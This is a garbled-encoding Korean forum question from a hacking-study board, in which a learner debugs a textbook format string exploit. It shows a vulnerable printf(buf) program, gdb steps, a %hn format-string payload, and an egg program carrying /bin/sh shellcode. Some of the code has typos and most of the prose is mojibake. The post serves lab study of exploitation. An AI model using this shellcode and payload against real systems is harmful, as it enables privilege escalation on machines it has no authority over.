http://www.hackerschool.org/HS_Boards/zboard.php?id=QNA_system&no=1448 []
лε ̴ּµ 밡 Ȱ ص ȵdz Ф
ڵ 2ߴµ ҽ Ʒ ڽϴ
gdb bugfile (bugfile ڵ) ҽ Ʒ
disass main
main+3 ãƼ (0x080483d3 )
break *0x08048657
run ġ (no debugging symbols found) ۶
info reg ġ $ebp 0xbff3a88
x/12 $ebp ġ 0xbff3a88
./egg ó ( egg ڵ) ҽ Ʒ
0xbff085e8
⼭ 1bff0 ̶ 85e8̶ 16 10 ȯ
114672 34280 ̶
⼭ 34280 16 ̹Ƿ 16 (34264)
¼ڳ 114672 - 34280 = (80392) δ
ڵ带 ¥ (printf "\x41\x41\x41\x41\x6c\xf3\xff\xbf\41\x41\x41\x41\xfe\xf3\xff\xbf%%34264d%%hn%%80392d%%hn"; cat) | ./bugfile
̶ ۼ
ϸ ̼ Ʈ 浵 Ф å ߴµ ȵǴ° (itcookbook Ȱа ǽ ýŷ Դϴ)
¥ ߸ ڳ ּ Ф
(ҽ)
bugfile.c
#include <stdio.h>
main() {
int i =0;
char buf[ 64];
memset (buf, 0, 64);
read(0, buf, 64);
printf(buf);
}
egg.c (幮Դϴ ļ Ÿ)
#include <stdlib.h>
#define DEFAULT_OFFSET 0
#define DEFAULT_BUFFER_SIZE 512
#define DEFAULT_EGG_SIZE 2048
#define NOP 0x90
char shellcode[] =
"\x31\xc0\xb0\x46\x31\xdb\x31\xc9\xcd\x80"
"\x55\x89\xe5\xeb\x1f\x5e\x89\x76\x08\x8d\x56\x0c\xcd\x80\x31\xdb\x89"
"\x0c\xb0\x0b\x89\xf3\x8d\x4e\x08\x8d\x56\x0c\xcd\x80\x31\xdb\x89"
"\xd8\x40\xcd\x80\xe8\xdc\xff\xff\xff\x2f\x62\x69\x6e\x2f\x73\x68"
"\x00\xc9\xc3\x90/bin/sh";
unnsigned long get_esp (void) {
__asm__("movl %esp, %eax")
main (int argc, char *argv[]) {
char *buff, *ptr, *egg;
long *addr_ptr, addr;
int offset=DEFAULT_OFFSET, bsize=DEFAULT_BUFFER_SIZE;
int i, eggsize=DEFAULT_EGG_SIZE;
if (argc > 1) bsize = atoi (argv[ 1]);
if (argc > 2) offset = atoi (argv[ 2]);
if (argc > 3) eggsize = atoi (argv[ 3]);
if (!(buff = malloc(bsize))) {
printf ("can't allocate memory.\n");
exit (0);
}
if (!(egg = malloc(eggsize))) {
printf("can't allocate memory.\n");
exit (0);
}
addr = get_esp() - offset;
printf("using address: 0x%x\n", addr);
ptr = buff;
addr_ptr = (long *) ptr;
for (i = 0; i < bsize; i+=4)
*(addr_ptr++_ = addr;
ptr = egg;
for (i = 0; i < eggsize - strlen (shellcode) - 1; i++)
* (ptr++) = NOP;
for (i = 0; i < strlen(shellcode); i++)
*(ptr++) = shellcode[ i];
buff[bsize - 1] = '\0';
egg[ eggsize - 1] = '\0';
memcpy (egg, "EGG=", 4);
putenv (egg);
memcpy (buff, "RET=", 4);
putenv (buff);
system("/bin/bash");
}
|
Hit : 4434 Date : 2010/12/07 04:29
|